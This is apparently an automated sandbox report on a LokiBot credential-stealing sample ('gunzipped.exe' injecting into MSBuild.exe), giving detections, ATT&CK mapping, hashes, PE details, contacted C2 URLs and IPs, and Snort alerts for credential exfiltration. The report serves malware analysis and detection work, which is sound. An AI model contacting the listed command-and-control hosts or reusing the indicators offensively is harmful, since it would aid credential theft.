                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000001.00000002.931659993.0000000000C58000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.734712266.0000000000C6F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.672292880.000000001270F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668425098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.669222842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.668771421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: gunzipped.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1852, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsNative API1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                gunzipped.exe100%AviraTR/Dropper.MSIL.Gen
                gunzipped.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                1.2.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.0.gunzipped.exe.3f0000.0.unpack100%AviraTR/Dropper.MSIL.GenDownload File
                0.2.gunzipped.exe.3f0000.0.unpack100%AviraHEUR/AGEN.1133163Download File
                1.0.MSBuild.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.MSBuild.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.MSBuild.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.MSBuild.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.MSBuild.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.MSBuild.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://jnxxx1.xyz/JRM/w2/fre.php0%Avira URL Cloudsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                https://jnxxx1.xyz/JRM/w2/fre.php0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                jnxxx1.xyz
                		104.21.60.171
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://jnxxx1.xyz/JRM/w2/fre.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: safe
                  		unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: safe
                  		unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: safe
                  		unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: safe
                  		unknown
                  https://jnxxx1.xyz/JRM/w2/fre.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.ibsensoftware.com/MSBuild.exe, MSBuild.exe, 00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmp, MSBuild.exe, 00000001.00000000.668076013.0000000000400000.00000040.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.60.171
                  		jnxxx1.xyzUnited States
                  		13335CLOUDFLARENETUStrue
                  172.67.198.111
                  		unknownUnited States
                  		13335CLOUDFLARENETUStrue

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:553234
                  Start date:14.01.2022
                  Start time:14:24:17
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:gunzipped.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/3@60/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 62.7% (good quality ratio 59.4%)
                  • Quality average: 76%
                  • Quality standard deviation: 29.7%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • HTTP Packets have been reduced
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 40.91.112.76, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62
                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: gunzipped.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  14:25:21API Interceptor57x Sleep call for process: MSBuild.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gunzipped.exe.log
                  Process:C:\Users\user\Desktop\gunzipped.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):654
                  Entropy (8bit):5.374391981354885
                  Encrypted:false
                  SSDEEP:12:Q3La/KDLI4MWuPTxAIOKbbDLI4MWuPOKN08JOKhap+92n4MNQpN9tv:ML9E4KrgKDE4KGKN08AKh6+84xpNT
                  MD5:C8A62E39DE7A3F805D39384E8BABB1E0
                  SHA1:B32B1257401F17A2D1D5D3CC1D8C1E072E3FEE31
                  SHA-256:A7BC127854C5327ABD50C86000BF10586B556A5E085BB23523B07A15DD4C5383
                  SHA-512:7DB2825131F5CDA6AF33A179D9F7CD0A206FF34AE50D6E66DE9E99BE2CD1CB985B88C00F0EDE72BBC4467E7E42B5DC6132403AA2EC1A0A7A6D11766C438B10C3
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbq:4
                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.712814063964112
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  • Win32 Executable (generic) a (10002005/4) 49.97%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:gunzipped.exe
                  File size:207368
                  MD5:a76b143e354a2ac9f363616ff4f8b239
                  SHA1:51bb9b6f0c004d4532ae7f83b58554c924f4d3cc
                  SHA256:d9bad692a869fdb2d3e9ec678e50f27e2dbe2f1fef185a8480df7eb5562d88f0
                  SHA512:08caf51783da2b857699ca0063410464e35faeec64a44d4e35ed7e098f5fa6447d36c8a01de7ab9ecbd863e690a910328ccb503e66a9ef679a98031bf5be5369
                  SSDEEP:3072:68RW5D8ndLRtj/fs+BrOxK2+pwWS8HaTvhwmo0hb2bRcO4RNNqV45M6/xsmFU3Gz:68rJT6x0Sxvhwmo0hb2bN0vz/lR
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n.a.................R..........>p... ........@.. .......................@............@................................

                  File Icon

                  Icon Hash:f8e6c6c5d5c4e4e8

                  Static PE Info

                  General

                  Entrypoint:0x42703e
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61E16EDC [Fri Jan 14 12:38:52 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Authenticode Signature

                  Signature Valid:false
                  Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                  Signature Validation Error:The digital signature of the object did not verify
                  Error Number:-2146869232
                  Not Before, Not After
                  • 7/12/2018 10:11:19 PM 7/26/2019 10:11:19 PM
                  Subject Chain
                  • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                  Version:3
                  Thumbprint MD5:EA2EAC5068FCE34E887927373AB894A0
                  Thumbprint SHA-1:9DC17888B5CFAD98B3CB35C1994E96227F061675
                  Thumbprint SHA-256:37A8A01D0CF930DCA58E725400AD06DD550970B92F49B0C3A15B321B4E4097DA
                  Serial:33000001B1DDEDBA54E965B85F0001000001B1

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x26fe40x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a0000x9600.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x2ec000x3e08.rsrc
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x280000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x250440x25200False0.906703756313data7.8171876408IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .reloc0x280000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  .rsrc0x2a0000x96000x9600False0.674609375data6.83137933544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x2a1f00x468GLS_BINARY_LSB_FIRST
                  RT_ICON0x2a6580x988data
                  RT_ICON0x2afe00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 57889722, next used block 7558074
                  RT_ICON0x2c0880x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                  RT_ICON0x2e6300x4b3cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                  RT_GROUP_ICON0x3316c0x4cdata
                  RT_VERSION0x331b80x25cdata
                  RT_MANIFEST0x334140x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyright
                  Assembly Version0.0.0.0
                  InternalNameLLLOOOLKKIIII.exe
                  FileVersion0.0.0.0
                  ProductVersion0.0.0.0
                  FileDescription
                  OriginalFilenameLLLOOOLKKIIII.exe

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  01/14/22-14:25:18.175313TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14977080192.168.2.4104.21.60.171
                  01/14/22-14:25:18.175313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.4104.21.60.171
                  01/14/22-14:25:18.175313TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.4104.21.60.171
                  01/14/22-14:25:18.175313TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24977080192.168.2.4104.21.60.171
                  01/14/22-14:25:19.900110TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14977180192.168.2.4104.21.60.171
                  01/14/22-14:25:19.900110TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.4104.21.60.171
                  01/14/22-14:25:19.900110TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.4104.21.60.171
                  01/14/22-14:25:19.900110TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24977180192.168.2.4104.21.60.171
                  01/14/22-14:25:21.284630TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.4172.67.198.111
                  01/14/22-14:25:21.284630TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.4172.67.198.111
                  01/14/22-14:25:21.284630TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.4172.67.198.111
                  01/14/22-14:25:21.284630TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.4172.67.198.111
                  01/14/22-14:25:23.253971TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.4104.21.60.171
                  01/14/22-14:25:23.253971TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.4104.21.60.171
                  01/14/22-14:25:23.253971TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.4104.21.60.171
                  01/14/22-14:25:23.253971TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.4104.21.60.171
                  01/14/22-14:25:25.064096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.4104.21.60.171
                  01/14/22-14:25:25.064096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.4104.21.60.171
                  01/14/22-14:25:25.064096TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.4104.21.60.171
                  01/14/22-14:25:25.064096TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.4104.21.60.171
                  01/14/22-14:25:26.426706TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.4104.21.60.171
                  01/14/22-14:25:26.426706TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.4104.21.60.171
                  01/14/22-14:25:26.426706TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.4104.21.60.171
                  01/14/22-14:25:26.426706TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.4104.21.60.171
                  01/14/22-14:25:27.981180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.4172.67.198.111
                  01/14/22-14:25:27.981180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.4172.67.198.111
                  01/14/22-14:25:27.981180TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.4172.67.198.111
                  01/14/22-14:25:27.981180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.4172.67.198.111
                  01/14/22-14:25:30.190933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.4172.67.198.111
                  01/14/22-14:25:30.190933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.4172.67.198.111
                  01/14/22-14:25:30.190933TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.4172.67.198.111
                  01/14/22-14:25:30.190933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.4172.67.198.111
                  01/14/22-14:25:31.656934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.4104.21.60.171
                  01/14/22-14:25:31.656934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.4104.21.60.171
                  01/14/22-14:25:31.656934TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.4104.21.60.171
                  01/14/22-14:25:31.656934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.4104.21.60.171
                  01/14/22-14:25:33.128240TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.4172.67.198.111
